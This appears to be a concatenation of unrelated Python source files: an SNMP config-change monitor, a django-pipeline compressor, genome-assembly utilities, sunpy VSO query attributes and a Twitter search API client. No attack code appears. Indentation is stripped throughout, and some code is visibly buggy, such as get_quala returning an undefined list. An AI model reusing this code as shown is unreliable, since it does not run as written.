return tables_dict, counts_dict
def make_output(tables_dict, counts_dict):
ordered_tables = [
('header_table', '>>> Report Header <<<'),
('summary_table', '>>> Report Summary <<<'),
('changed', '>>> %d *Changed* Devices <<<' % (
counts_dict['change_count']
)),
('unchanged', '>>> %d *UnChanged* Devices <<<' % (
counts_dict['unchange_count']
)),
]
output = ""
for table_tuple in ordered_tables:
table = table_tuple[0]
msg = table_tuple[1]
if table == 'changed' and counts_dict['change_count'] == 0:
continue
elif table == 'unchanged' and counts_dict['unchange_count'] == 0:
continue
else:
output = output + msg + '\n' + str(tables_dict['tables'][table]) + '\n'
return output
def email_output(output):
m_from = config.cfg.email.get('from')
m_to = config.cfg.email.get('to')
subject = "Detected Device Config Change"
send_mail(m_from, m_to, subject, output)
return True
def main(args):
saved_data, saved_devices = get_device_data(
args.data_files,
)
snmp_data = get_device_snmp_data(
args.devices,
args.user_tuple,
args.oids_dict
)
devices_dict = compare_snmp_saved(
snmp_data,
saved_devices
)
save_device_data(args.data_files, snmp_data)
tables_dict = setup_tables(devices_dict)
tables_dict, counts_dict = compile_tables_data(devices_dict, tables_dict)
output = make_output(tables_dict, counts_dict)
# print to screen
print output
# send email if there was a change and email_enable == True
if config.cfg.email.get('email_enabled') and counts_dict['change_count'] > 0:
email_output(output)
if __name__ == "__main__":
args = setup()
while True:
main(args)
time.sleep(config.cfg.loop_pause_seconds)
|
|
from __future__ import unicode_literals
import base64
import os
import posixpath
import re
from itertools import takewhile
from django.utils.encoding import smart_bytes, force_text
from pipeline.conf import settings
from pipeline.storage import default_storage
from pipeline.utils import to_class, relpath
from pipeline.exceptions import CompressorError
URL_DETECTOR = r'url\([\'"]?([^\s)]+\.[a-z]+[^\'"\s]*)[\'"]?\)'
URL_REPLACER = r'url\(__EMBED__(.+?)(\?\d+)?\)'
DEFAULT_TEMPLATE_FUNC = "template"
TEMPLATE_FUNC = r"""var template = function(str){var fn = new Function('obj', 'var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push(\''+str.replace(/\\/g, '\\\\').replace(/'/g, "\\'").replace(/<%=([\s\S]+?)%>/g,function(match,code){return "',"+code.replace(/\\'/g, "'")+",'";}).replace(/<%([\s\S]+?)%>/g,function(match,code){return "');"+code.replace(/\\'/g, "'").replace(/[\r\n\t]/g,' ')+"__p.push('";}).replace(/\r/g,'\\r').replace(/\n/g,'\\n').replace(/\t/g,'\\t')+"');}return __p.join('');");return fn;};"""
MIME_TYPES = {
'.png': 'image/png',
'.jpg': 'image/jpeg',
'.jpeg': 'image/jpeg',
'.gif': 'image/gif',
'.tif': 'image/tiff',
'.tiff': 'image/tiff',
'.ttf': 'font/truetype',
'.otf': 'font/opentype',
'.woff': 'font/woff'
}
EMBED_EXTS = MIME_TYPES.keys()
FONT_EXTS = ['.ttf', '.otf', '.woff']
class Compressor(object):
asset_contents = {}
def __init__(self, storage=default_storage, verbose=False):
self.storage = storage
self.verbose = verbose
@property
def js_compressor(self):
return to_class(settings.PIPELINE_JS_COMPRESSOR)
@property
def css_compressor(self):
return to_class(settings.PIPELINE_CSS_COMPRESSOR)
def compress_js(self, paths, templates=None, **kwargs):
"""Concatenate and compress JS files"""
js = self.concatenate(paths)
if templates:
js = js + self.compile_templates(templates)
if not settings.PIPELINE_DISABLE_WRAPPER:
js = "(function() { %s }).call(this);" % js
compressor = self.js_compressor
if compressor:
js = getattr(compressor(verbose=self.verbose), 'compress_js')(js)
return js
def compress_css(self, paths, output_filename, variant=None, **kwargs):
"""Concatenate and compress CSS files"""
css = self.concatenate_and_rewrite(paths, output_filename, variant)
compressor = self.css_compressor
if compressor:
css = getattr(compressor(verbose=self.verbose), 'compress_css')(css)
if not variant:
return css
elif variant == "datauri":
return self.with_data_uri(css)
else:
raise CompressorError("\"%s\" is not a valid variant" % variant)
def compile_templates(self, paths):
compiled = ""
if not paths:
return compiled
namespace = settings.PIPELINE_TEMPLATE_NAMESPACE
base_path = self.base_path(paths)
for path in paths:
contents = self.read_text(path)
contents = re.sub("\r?\n", "\\\\n", contents)
contents = re.sub("'", "\\'", contents)
name = self.template_name(path, base_path)
compiled += "%s['%s'] = %s('%s');\n" % (
namespace,
name,
settings.PIPELINE_TEMPLATE_FUNC,
contents
)
compiler = TEMPLATE_FUNC if settings.PIPELINE_TEMPLATE_FUNC == DEFAULT_TEMPLATE_FUNC else ""
return "\n".join([
"%(namespace)s = %(namespace)s || {};" % {'namespace': namespace},
compiler,
compiled
])
def base_path(self, paths):
def names_equal(name):
return all(n == name[0] for n in name[1:])
directory_levels = zip(*[p.split(os.sep) for p in paths])
return os.sep.join(x[0] for x in takewhile(names_equal, directory_levels))
def template_name(self, path, base):
"""Find out the name of a JS template"""
if not base:
path = os.path.basename(path)
if path == base:
base = os.path.dirname(path)
name = re.sub(r"^%s[\/\\]?(.*)%s$" % (
re.escape(base), re.escape(settings.PIPELINE_TEMPLATE_EXT)
), r"\1", path)
return re.sub(r"[\/\\]", "_", name)
def concatenate_and_rewrite(self, paths, output_filename, variant=None):
"""Concatenate together files and rewrite urls"""
stylesheets = []
for path in paths:
def reconstruct(match):
asset_path = match.group(1)
if asset_path.startswith("http") or asset_path.startswith("//"):
return "url(%s)" % asset_path
asset_url = self.construct_asset_path(asset_path, path,
output_filename, variant)
return "url(%s)" % asset_url
content = self.read_text(path)
# content needs to be unicode to avoid explosions with non-ascii chars
content = re.sub(URL_DETECTOR, reconstruct, content)
stylesheets.append(content)
return '\n'.join(stylesheets)
def concatenate(self, paths):
"""Concatenate together a list of files"""
return "\n".join([self.read_text(path) for path in paths])
def construct_asset_path(self, asset_path, css_path, output_filename, variant=None):
"""Return a rewritten asset URL for a stylesheet"""
public_path = self.absolute_path(asset_path, os.path.dirname(css_path).replace('\\', '/'))
if self.embeddable(public_path, variant):
return "__EMBED__%s" % public_path
if not posixpath.isabs(asset_path):
asset_path = self.relative_path(public_path, output_filename)
return asset_path
def embeddable(self, path, variant):
"""Is the asset embeddable ?"""
name, ext = os.path.splitext(path)
font = ext in FONT_EXTS
if not variant:
return False
if not (re.search(settings.PIPELINE_EMBED_PATH, path.replace('\\', '/')) and self.storage.exists(path)):
return False
if not ext in EMBED_EXTS:
return False
if not (font or len(self.encoded_content(path)) < settings.PIPELINE_EMBED_MAX_IMAGE_SIZE):
return False
return True
def with_data_uri(self, css):
def datauri(match):
path = match.group(1)
mime_type = self.mime_type(path)
data = self.encoded_content(path)
return "url(\"data:%s;charset=utf-8;base64,%s\")" % (mime_type, data)
return re.sub(URL_REPLACER, datauri, css)
def encoded_content(self, path):
"""Return the base64 encoded contents"""
if path in self.__class__.asset_contents:
return self.__class__.asset_contents[path]
data = self.read_bytes(path)
self.__class__.asset_contents[path] = base64.b64encode(data)
return self.__class__.asset_contents[path]
def mime_type(self, path):
"""Get mime-type from filename"""
name, ext = os.path.splitext(path)
return MIME_TYPES[ext]
def absolute_path(self, path, start):
"""
Return the absolute public path for an asset,
given the path of the stylesheet that contains it.
"""
if posixpath.isabs(path):
path = posixpath.join(default_storage.location, path)
else:
path = posixpath.join(start, path)
return posixpath.normpath(path)
def relative_path(self, absolute_path, output_filename):
"""Rewrite paths relative to the output stylesheet path"""
absolute_path = posixpath.join(settings.PIPELINE_ROOT, absolute_path)
output_path = posixpath.join(settings.PIPELINE_ROOT, posixpath.dirname(output_filename))
return relpath(absolute_path, output_path)
def read_bytes(self, path):
"""Read file content in binary mode"""
file = default_storage.open(path)
content = file.read()
file.close()
return content
def read_text(self, path):
content = self.read_bytes(path)
return force_text(content)
class CompressorBase(object):
def __init__(self, verbose):
self.verbose = verbose
def filter_css(self, css):
raise NotImplementedError
def filter_js(self, js):
raise NotImplementedError
class SubProcessCompressor(CompressorBase):
def execute_command(self, command, content):
import subprocess
pipe = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, stderr=subprocess.PIPE)
if content:
content = smart_bytes(content)
stdout, stderr = pipe.communicate(content)
if stderr.strip():
raise CompressorError(stderr)
if self.verbose:
print(stderr)
return stdout
|
|
#! /usr/bin/env python
"""Assembly execution drivers.
This module provides the default parameters and handling of
assembler-specific configurations.
Assembler defaults are set in the 'arast.conf' file
"""
import logging
import os
import re
import subprocess
import shutil
import glob
import metadata as meta
from ConfigParser import SafeConfigParser
def get_default(key):
"""Get assemblers default value from config file."""
return parser.get('assemblers', key)
def run(assembler, job_data):
plugin = self.pmanager.getPluginByName(assembler)
settings = plugin.details.items('Settings')
return plugin.plugin_object(settings, job_data)
def get_tar_name(job_id, suffix):
name = 'job' + str(job_id)
name += '_'
name += suffix
name += '.tar.gz'
return name
def tar(outpath, asm_data, tarname):
print "Compressing"
outfile = outpath + '/tar/'
try:
os.makedirs(outfile)
except:
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, asm_data]
t = subprocess.Popen(targs)
t.wait()
return outfile
def tar_directory(outpath, directory, tarname):
outfile = outpath
try:
os.makedirs(outfile)
except:
pass
outfile += tarname
targs = ['tar', '-czvf', outfile, './']
t = subprocess.Popen(targs, cwd=directory)
t.wait()
return outfile
def tar_list(outpath, file_list, tarname):
""" Tars a file list. Attempts to find the highest common path"""
common_path = os.path.commonprefix(file_list)
outfile = outpath + '/tar/'
try: os.makedirs(outfile)
except: pass
outfile += tarname
targs = ['tar', '-czvf', outfile]
targs += [os.path.relpath(path, common_path) for path in file_list]
logging.debug("Tar command: %s: " % targs)
t = subprocess.Popen(targs, cwd=common_path)
t.wait()
return outfile
def ls_recursive(path):
""" Returns list of all files in a dir"""
allfiles = []
for root, sub_dirs, files in os.walk(path):
for f in files:
allfiles.append(os.path.join(root, f))
return allfiles
def prefix_file_move(file, prefix):
""" Adds prefix to file, returns new file name, moves file"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
os.rename(file, newfile)
return newfile
def prefix_file(file, prefix):
""" Adds prefix to file, returns new filename"""
if os.path.isdir(file):
return file
f = '/' + str(prefix) + '__' + os.path.basename(file)
newfile = os.path.split(file)[0] + f
return newfile
def rename_file_copy(filepath, newname):
""" Renames the file, keeping the file extension, copies to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
shutil.copy(filepath, newfile)
return newfile
def rename_file_symlink(filepath, newname):
""" Renames the file, keeping the file extension, symlinks to new file name"""
f = '/' + newname + '.' + os.path.basename(filepath).rsplit('.', 1)[1]
newfile = os.path.split(filepath)[0] + f
os.symlink(filepath, newfile)
return newfile
def get_fasta(directory):
""" Return the list of Fasta files in DIRECTORY
"""
files = os.listdir(directory)
fasta_files = [file for file in files
if re.search(r'\.fa$|\.fasta$', file, re.IGNORECASE) is not None]
return fasta_files
def get_fastq(directory):
""" Return the list of Fastq files in DIRECTORY
"""
files = os.listdir(directory)
fastq_files = [file for file in files
if re.search(r'\.fq$|\.fastq$', file, re.IGNORECASE) is not None]
return fastq_files
def get_quala(directory):
""" Return the list of Quala files in DIRECTORY
"""
files = os.listdir(directory)
quala_files = [file for file in files
if re.search(r'\.qa$|\.quala$', file, re.IGNORECASE) is not None]
return fastq_files
def read_config():
pass
def run_bwa(data_dir, ref_name, read_files, prefix):
""" Ex: run_bwa(velvet_data, 'contigs.fa', reads_list, 'velvet') """
bwa_exec = 'bwa'
samtools_exec = 'samtools'
tmp_files = []
ref_file = data_dir + ref_name
# Run the index on reference
bwa_args = [bwa_exec, 'index']
bwa_args.append(ref_file)
logging.info(bwa_args)
p_index = subprocess.Popen(bwa_args)
p_index.wait()
# Align reads to reference
bwa_args = [bwa_exec, 'aln']
bwa_args.append(ref_file)
if len(read_files) > 1:
# Concatenate read files
reads = data_dir + 'reads.fa'
destination = open(reads,'wb')
for rf in read_files:
logging.info("Concatenating read file: %s", rf)
shutil.copyfileobj(open(rf,'rb'), destination)
destination.close()
tmp_files.append(reads)
else:
reads = read_files[0]
bwa_args.append(reads)
aln_out = data_dir + prefix
aln_out += '_aln.sai'
aln_outbuffer = open(aln_out, 'wb')
tmp_files.append(aln_out)
bwa_args.append(aln_out)
logging.info(bwa_args)
p_aln = subprocess.Popen(bwa_args, stdout=aln_outbuffer)
p_aln.wait()
aln_outbuffer.close()
# Create Sam file
#bwa samse $ref $dir/aln-$refX$reads.sai $reads > $dir/aln-$refX$reads.sam
bwa_args = [bwa_exec, 'samse', ref_file, aln_out, reads]
sam_out = data_dir + prefix
sam_out += '_aln.sam'
sam_outbuffer = open(sam_out, 'wb')
tmp_files.append(sam_out)
bwa_args.append(sam_out)
logging.info(bwa_args)
p_sam = subprocess.Popen(bwa_args, stdout=sam_outbuffer)
p_sam.wait()
sam_outbuffer.close()
# Create bam file
# samtools view -S -b -o $dir/aln-$refX$reads.bam $dir/aln-$refX$reads.sam
samtools_args = [samtools_exec, 'view', '-S', '-b', '-o']
bam_out = data_dir + prefix
bam_out += '_aln.bam'
bam_outbuffer = open(bam_out, 'wb')
samtools_args.append(bam_out)
samtools_args.append(sam_out)
logging.info(samtools_args)
p_bam = subprocess.Popen(samtools_args, stdout=bam_outbuffer)
p_bam.wait()
bam_outbuffer.close()
for temp in tmp_files:
try:
os.remove(temp)
except:
logging.info("Could not remove %s" % temp)
return bam_out
def get_qual_encoding(file):
f = open(file, 'r')
while True:
bline = f.readline()
if bline.find('+') != -1: # Line before quality line
line = f.readline()
for c in line:
if ord(c) > 74:
logging.info("Detected phred64 quality encoding")
return 'phred64'
elif ord(c) < 64:
logging.info("Detected phred33 quality encoding")
return 'phred33'
if len(bline) == 0: #EOF
break
return
def tab_to_fasta(tabbed_file, outfile, threshold):
tabbed = open(tabbed_file, 'r')
fasta = open(outfile, 'w')
#prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', '\n']
prefixes = ['>_', ' len_', ' cov_', ' stdev_', ' GC_', ' seed_', '\n']
for line in tabbed:
l = line.split('\t')
if int(l[1]) <= threshold:
for i in range(len(l)):
fasta.write(prefixes[i] + l[i])
tabbed.close()
fasta.close()
def arast_reads(filelist):
""" Returns a list of files into the ARAST reads dict format """
filedicts = []
for f in filelist:
filedicts.append({'type':'single', 'files':[f]})
return filedicts
parser = SafeConfigParser()
#parser.read('arast.conf')
#basepath = get_default('basepath')
#metadata = meta.MetadataConnection(parser.get('meta','mongo.remote.host'))
|
|
# -*- coding: utf-8 -*-
# Author: Florian Mayer <florian.mayer@bitsrc.org>
#
# This module was developed with funding provided by
# the ESA Summer of Code (2011).
#
# pylint: disable=C0103,R0903
"""
Attributes that can be used to construct VSO queries. Attributes are the
fundamental building blocks of queries that, together with the two
operations of AND and OR (and in some rare cases XOR) can be used to
construct complex queries. Most attributes can only be used once in an
AND-expression, if you still attempt to do so it is called a collision,
for a quick example think about how the system should handle
Instrument('aia') & Instrument('eit').
"""
from __future__ import absolute_import
from datetime import datetime
from sunpy.net.attr import (
Attr, ValueAttr, AttrWalker, AttrAnd, AttrOr, DummyAttr, ValueAttr
)
from sunpy.util.util import to_angstrom
from sunpy.util.multimethod import MultiMethod
from sunpy.time import parse_time
TIMEFORMAT = '%Y%m%d%H%M%S'
class _Range(object):
def __init__(self, min_, max_, create):
self.min = min_
self.max = max_
self.create = create
def __xor__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
new = DummyAttr()
if self.min < other.min:
new |= self.create(self.min, min(other.min, self.max))
if other.max < self.max:
new |= self.create(other.max, self.max)
return new
def __contains__(self, other):
return self.min <= other.min and self.max >= other.max
class Wave(Attr, _Range):
def __init__(self, wavemin, wavemax, waveunit='Angstrom'):
self.min, self.max = sorted(
to_angstrom(v, waveunit) for v in [wavemin, wavemax]
)
self.unit = 'Angstrom'
Attr.__init__(self)
_Range.__init__(self, self.min, self.max, self.__class__)
def collides(self, other):
return isinstance(other, self.__class__)
class Time(Attr, _Range):
def __init__(self, start, end, near=None):
self.start = parse_time(start)
self.end = parse_time(end)
self.near = None if near is None else parse_time(near)
_Range.__init__(self, self.start, self.end, self.__class__)
Attr.__init__(self)
def collides(self, other):
return isinstance(other, self.__class__)
def __xor__(self, other):
if not isinstance(other, self.__class__):
raise TypeError
if self.near is not None or other.near is not None:
raise TypeError
return _Range.__xor__(self, other)
def pad(self, timedelta):
return Time(self.start - timedelta, self.start + timedelta)
def __repr__(self):
return '<Time(%r, %r, %r)>' % (self.start, self.end, self.near)
class Extent(Attr):
# pylint: disable=R0913
def __init__(self, x, y, width, length, type_):
Attr.__init__(self)
self.x = x
self.y = y
self.width = width
self.length = length
self.type = type_
def collides(self, other):
return isinstance(other, self.__class__)
class Field(ValueAttr):
def __init__(self, fielditem):
ValueAttr.__init__(self, {
('field', 'fielditem'): fielditem
})
class _VSOSimpleAttr(Attr):
""" A _SimpleAttr is an attribute that is not composite, i.e. that only
has a single value, such as, e.g., Instrument('eit'). """
def __init__(self, value):
Attr.__init__(self)
self.value = value
def collides(self, other):
return isinstance(other, self.__class__)
def __repr__(self):
return "<%s(%r)>" % (self.__class__.__name__, self.value)
class Provider(_VSOSimpleAttr):
pass
class Source(_VSOSimpleAttr):
pass
class Instrument(_VSOSimpleAttr):
pass
class Physobs(_VSOSimpleAttr):
pass
class Pixels(_VSOSimpleAttr):
pass
class Level(_VSOSimpleAttr):
pass
class Resolution(_VSOSimpleAttr):
pass
class Detector(_VSOSimpleAttr):
pass
class Filter(_VSOSimpleAttr):
pass
class Sample(_VSOSimpleAttr):
pass
class Quicklook(_VSOSimpleAttr):
pass
class PScale(_VSOSimpleAttr):
pass
# The walker specifies how the Attr-tree is converted to a query the
# server can handle.
walker = AttrWalker()
# The _create functions make a new VSO query from the attribute tree,
# the _apply functions take an existing query-block and update it according
# to the attribute tree passed in as root. Different attributes require
# different functions for conversion into query blocks.
@walker.add_creator(ValueAttr, AttrAnd)
# pylint: disable=E0102,C0103,W0613
def _create(wlk, root, api):
""" Implementation detail. """
value = api.factory.create('QueryRequestBlock')
wlk.apply(root, api, value)
return [value]
@walker.add_applier(ValueAttr)
# pylint: disable=E0102,C0103,W0613
def _apply(wlk, root, api, queryblock):
""" Implementation detail. """
for k, v in root.attrs.iteritems():
lst = k[-1]
rest = k[:-1]
block = queryblock
for elem in rest:
block = block[elem]
block[lst] = v
@walker.add_applier(AttrAnd)
# pylint: disable=E0102,C0103,W0613
def _apply(wlk, root, api, queryblock):
""" Implementation detail. """
for attr in root.attrs:
wlk.apply(attr, api, queryblock)
@walker.add_creator(AttrOr)
# pylint: disable=E0102,C0103,W0613
def _create(wlk, root, api):
""" Implementation detail. """
blocks = []
for attr in root.attrs:
blocks.extend(wlk.create(attr, api))
return blocks
@walker.add_creator(DummyAttr)
# pylint: disable=E0102,C0103,W0613
def _create(wlk, root, api):
""" Implementation detail. """
return api.factory.create('QueryRequestBlock')
@walker.add_applier(DummyAttr)
# pylint: disable=E0102,C0103,W0613
def _apply(wlk, root, api, queryblock):
""" Implementation detail. """
pass
# Converters take a type unknown to the walker and convert it into one
# known to it. All of those convert types into ValueAttrs, which are
# handled above by just assigning according to the keys and values of the
# attrs member.
walker.add_converter(Extent)(
lambda x: ValueAttr(
dict((('extent', k), v) for k, v in vars(x).iteritems())
)
)
walker.add_converter(Time)(
lambda x: ValueAttr({
('time', 'start'): x.start.strftime(TIMEFORMAT),
('time', 'end'): x.end.strftime(TIMEFORMAT) ,
('time', 'near'): (
x.near.strftime(TIMEFORMAT) if x.near is not None else None),
})
)
walker.add_converter(_VSOSimpleAttr)(
lambda x: ValueAttr({(x.__class__.__name__.lower(), ): x.value})
)
walker.add_converter(Wave)(
lambda x: ValueAttr({
('wave', 'wavemin'): x.min,
('wave', 'wavemax'): x.max,
('wave', 'waveunit'): x.unit,
})
)
# The idea of using a multi-method here - that means a method which dispatches
# by type but is not attached to said class - is that the attribute classes are
# designed to be used not only in the context of VSO but also elsewhere (which
# AttrAnd and AttrOr obviously are - in the HEK module). If we defined the
# filter method as a member of the attribute classes, we could only filter
# one type of data (that is, VSO data).
filter_results = MultiMethod(lambda *a, **kw: (a[0], ))
# If we filter with ANDed together attributes, the only items are the ones
# that match all of them - this is implementing by ANDing the pool of items
# with the matched items - only the ones that match everything are there
# after this.
@filter_results.add_dec(AttrAnd)
def _(attr, results):
res = set(results)
for elem in attr.attrs:
res &= filter_results(elem, res)
return res
# If we filter with ORed attributes, the only attributes that should be
# removed are the ones that match none of them. That's why we build up the
# resulting set by ORing all the matching items.
@filter_results.add_dec(AttrOr)
def _(attr, results):
res = set()
for elem in attr.attrs:
res |= filter_results(elem, results)
return res
# Filter out items by comparing attributes.
@filter_results.add_dec(_VSOSimpleAttr)
def _(attr, results):
attrname = attr.__class__.__name__.lower()
return set(
item for item in results
# Some servers seem to obmit some fields. No way to filter there.
if not hasattr(item, attrname) or
getattr(item, attrname).lower() == attr.value.lower()
)
# The dummy attribute does not filter at all.
@filter_results.add_dec(DummyAttr, Field)
def _(attr, results):
return set(results)
@filter_results.add_dec(Wave)
def _(attr, results):
return set(
it for it in results
if
attr.min <= to_angstrom(it.wave.wavemax, it.wave.waveunit)
and
attr.max >= to_angstrom(it.wave.wavemin, it.wave.waveunit)
)
@filter_results.add_dec(Time)
def _(attr, results):
return set(
it for it in results
if
attr.min <= datetime.strptime(it.time.end, TIMEFORMAT)
and
attr.max >= datetime.strptime(it.time.start, TIMEFORMAT)
)
@filter_results.add_dec(Extent)
def _(attr, results):
return set(
it for it in results
if it.extent.type.lower() == attr.type.lower()
)
|
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
__author__="Scott Hendrickson, Josh Montague"
import sys
import requests
import json
import codecs
import datetime
import time
import os
import re
import unicodedata
from acscsv.twitter_acs import TwacsCSV
## update for python3
if sys.version_info[0] == 2:
reload(sys)
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
sys.stdin = codecs.getreader('utf-8')(sys.stdin)
#remove this
requests.packages.urllib3.disable_warnings()
# formatter of data from API
TIME_FORMAT_SHORT = "%Y%m%d%H%M"
TIME_FORMAT_LONG = "%Y-%m-%dT%H:%M:%S.000Z"
PAUSE = 1 # seconds between page requests
POSTED_TIME_IDX = 1
#date time parsing utility regex
DATE_TIME_RE = re.compile("([0-9]{4}).([0-9]{2}).([0-9]{2}).([0-9]{2}):([0-9]{2})")
class Query(object):
"""Object represents a single search API query and provides utilities for
managing parameters, executing the query and parsing the results."""
def __init__(self
, user
, password
, stream_url
, paged = False
, output_file_path = None
, hard_max = None
):
"""A Query requires at least a valid user name, password and endpoint url.
The URL of the endpoint should be the JSON records endpoint, not the counts
endpoint.
Additional parambers specifying paged search and output file path allow
for making queries which return more than the 500 activity limit imposed by
a single call to the API. This is called paging or paged search. Setting
paged = True will enable the token interpretation
functionality provided in the API to return a seamless set of activites.
Once the object is created, it can be used for repeated access to the
configured end point with the same connection configuration set at
creation."""
self.output_file_path = output_file_path
self.paged = paged
self.hard_max = hard_max
self.paged_file_list = []
self.user = user
self.password = password
self.end_point = stream_url # activities end point NOT the counts end point
# get a parser for the twitter columns
# TODO: use the updated retriveal methods in gnacs instead of this?
self.twitter_parser = TwacsCSV(",", None, False, True, False, True, False, False, False)
# Flag for post processing tweet timeline from tweet times
self.tweet_times_flag = False
def set_dates(self, start, end):
"""Utility function to set dates from strings. Given string-formated
dates for start date time and end date time, extract the required
date string format for use in the API query and make sure they
are valid dates.
Sets class fromDate and toDate date strings."""
if start:
dt = re.search(DATE_TIME_RE, start)
if not dt:
raise ValueError("Error. Invalid start-date format: %s \n"%str(start))
else:
f =''
for i in range(re.compile(DATE_TIME_RE).groups):
f += dt.group(i+1)
self.fromDate = f
# make sure this is a valid date
tmp_start = datetime.datetime.strptime(f, TIME_FORMAT_SHORT)
if end:
dt = re.search(DATE_TIME_RE, end)
if not dt:
raise ValueError("Error. Invalid end-date format: %s \n"%str(end))
else:
e =''
for i in range(re.compile(DATE_TIME_RE).groups):
e += dt.group(i+1)
self.toDate = e
# make sure this is a valid date
tmp_end = datetime.datetime.strptime(e, TIME_FORMAT_SHORT)
if start:
if tmp_start >= tmp_end:
raise ValueError("Error. Start date greater than end date.\n")
def name_munger(self, f):
"""Utility function to create a valid, friendly file name base
string from an input rule."""
f = re.sub(' +','_',f)
f = f.replace(':','_')
f = f.replace('"','_Q_')
f = f.replace('(','_p_')
f = f.replace(')','_p_')
self.file_name_prefix = unicodedata.normalize(
"NFKD",f[:42]).encode(
"ascii","ignore")
def request(self):
"""HTTP request based on class variables for rule_payload,
stream_url, user and password"""
try:
s = requests.Session()
s.headers = {'Accept-encoding': 'gzip'}
s.auth = (self.user, self.password)
res = s.post(self.stream_url, data=json.dumps(self.rule_payload))
if res.status_code != 200:
sys.stderr.write("Exiting with HTTP error code {}\n".format(res.status_code))
sys.stderr.write("ERROR Message: {}\n".format(res.json()["error"]["message"]))
if 1==1: #self.return_incomplete:
sys.stderr.write("Returning incomplete dataset.")
return(res.content.decode(res.encoding))
sys.exit(-1)
except requests.exceptions.ConnectionError as e:
e.msg = "Error (%s). Exiting without results."%str(e)
raise e
except requests.exceptions.HTTPError as e:
e.msg = "Error (%s). Exiting without results."%str(e)
raise e
except requests.exceptions.MissingSchema as e:
e.msg = "Error (%s). Exiting without results."%str(e)
raise e
#Don't use res.text as it creates encoding challenges!
return(res.content.decode(res.encoding))
def parse_responses(self, count_bucket):
"""Parse returned responses.
When paged=True, manage paging using the API token mechanism
When output file is set, write output files for paged output."""
acs = []
repeat = True
page_count = 1
self.paged_file_list = []
while repeat:
doc = self.request()
tmp_response = json.loads(doc)
if "results" in tmp_response:
acs.extend(tmp_response["results"])
else:
raise ValueError("Invalid request\nQuery: %s\nResponse: %s"%(self.rule_payload, doc))
if self.hard_max is None or len(acs) < self.hard_max:
repeat = False
if self.paged or count_bucket:
if len(acs) > 0:
if self.output_file_path is not None:
# writing to file
file_name = self.output_file_path + "/{0}_{1}.json".format(
str(datetime.datetime.utcnow().strftime(
"%Y%m%d%H%M%S"))
, str(self.file_name_prefix))
with codecs.open(file_name, "wb","utf-8") as out:
for item in tmp_response["results"]:
out.write(json.dumps(item)+"\n")
self.paged_file_list.append(file_name)
# if writing to file, don't keep track of all the data in memory
acs = []
else:
# storing in memory, so give some feedback as to size
sys.stderr.write("[{0:8d} bytes] {1:5d} total activities retrieved...\n".format(
sys.getsizeof(acs)
, len(acs)))
else:
sys.stderr.write( "No results returned for rule:{0}\n".format(str(self.rule_payload)) )
if "next" in tmp_response:
self.rule_payload["next"]=tmp_response["next"]
repeat = True
page_count += 1
sys.stderr.write( "Fetching page {}...\n".format(page_count) )
else:
if "next" in self.rule_payload:
del self.rule_payload["next"]
repeat = False
time.sleep(PAUSE)
else:
# stop iterating after reaching hard_max
repeat = False
return acs
def get_time_series(self):
if self.paged and self.output_file_path is not None:
for file_name in self.paged_file_list:
with codecs.open(file_name,"rb") as f:
for res in f:
rec = json.loads(res.decode('utf-8').strip())
t = datetime.datetime.strptime(rec["timePeriod"], TIME_FORMAT_SHORT)
yield [rec["timePeriod"], rec["count"], t]
else:
if self.tweet_times_flag:
# todo: list of tweets, aggregate by bucket
raise NotImplementedError("Aggregated buckets on json tweets not implemented!")
else:
for i in self.time_series:
yield i
def get_activity_set(self):
"""Generator iterates through the entire activity set from memory or disk."""
if self.paged and self.output_file_path is not None:
for file_name in self.paged_file_list:
with codecs.open(file_name,"rb") as f:
for res in f:
yield json.loads(res.decode('utf-8'))
else:
for res in self.rec_dict_list:
yield res
def get_list_set(self):
"""Like get_activity_set, but returns a list containing values parsed by
current Twacs parser configuration."""
for rec in self.get_activity_set():
yield self.twitter_parser.get_source_list(rec)
def execute(self
, pt_filter
, max_results = 100
, start = None
, end = None
, count_bucket = None # None is json
, show_query = False):
"""Execute a query with filter, maximum results, start and end dates.
Count_bucket determines the bucket size for the counts endpoint.
If the count_bucket variable is set to a valid bucket size such
as mintute, day or week, then the acitivity counts endpoint will
Otherwise, the data endpoint is used."""
# set class start and stop datetime variables
self.set_dates(start, end)
# make a friendlier file name from the rules
self.name_munger(pt_filter)
if self.paged or max_results > 500:
# avoid making many small requests
max_results = 500
self.rule_payload = {
'query': pt_filter
}
self.rule_payload["maxResults"] = int(max_results)
if start:
self.rule_payload["fromDate"] = self.fromDate
if end:
self.rule_payload["toDate"] = self.toDate
# use the proper endpoint url
self.stream_url = self.end_point
if count_bucket:
if not self.end_point.endswith("counts.json"):
self.stream_url = self.end_point[:-5] + "/counts.json"
if count_bucket not in ['day', 'minute', 'hour']:
raise ValueError("Error. Invalid count bucket: %s \n"%str(count_bucket))
self.rule_payload["bucket"] = count_bucket
self.rule_payload.pop("maxResults",None)
# for testing, show the query JSON and stop
if show_query:
sys.stderr.write("API query:\n")
sys.stderr.write(json.dumps(self.rule_payload) + '\n')
sys.exit()
# set up variable to catch the data in 3 formats
self.time_series = []
self.rec_dict_list = []
self.rec_list_list = []
self.res_cnt = 0
# timing
self.delta_t = 1 # keeps us from crashing
# actual oldest tweet before now
self.oldest_t = datetime.datetime.utcnow()
# actual newest tweet more recent that 30 days ago
# self.newest_t = datetime.datetime.utcnow() - datetime.timedelta(days=30)
# search v2: newest date is more recent than 2006-03-01T00:00:00
self.newest_t = datetime.datetime.strptime("2006-03-01T00:00:00.000z", TIME_FORMAT_LONG)
#
for rec in self.parse_responses(count_bucket):
# parse_responses returns only the last set of activities retrieved, not all paged results.
# to access the entire set, use the helper functions get_activity_set and get_list_set!
self.res_cnt += 1
self.rec_dict_list.append(rec)
if count_bucket:
# timeline data
t = datetime.datetime.strptime(rec["timePeriod"], TIME_FORMAT_SHORT)
tmp_tl_list = [rec["timePeriod"], rec["count"], t]
self.tweet_times_flag = False
else:
# json activities
# keep track of tweet times for time calculation
tmp_list = self.twitter_parser.procRecordToList(rec)
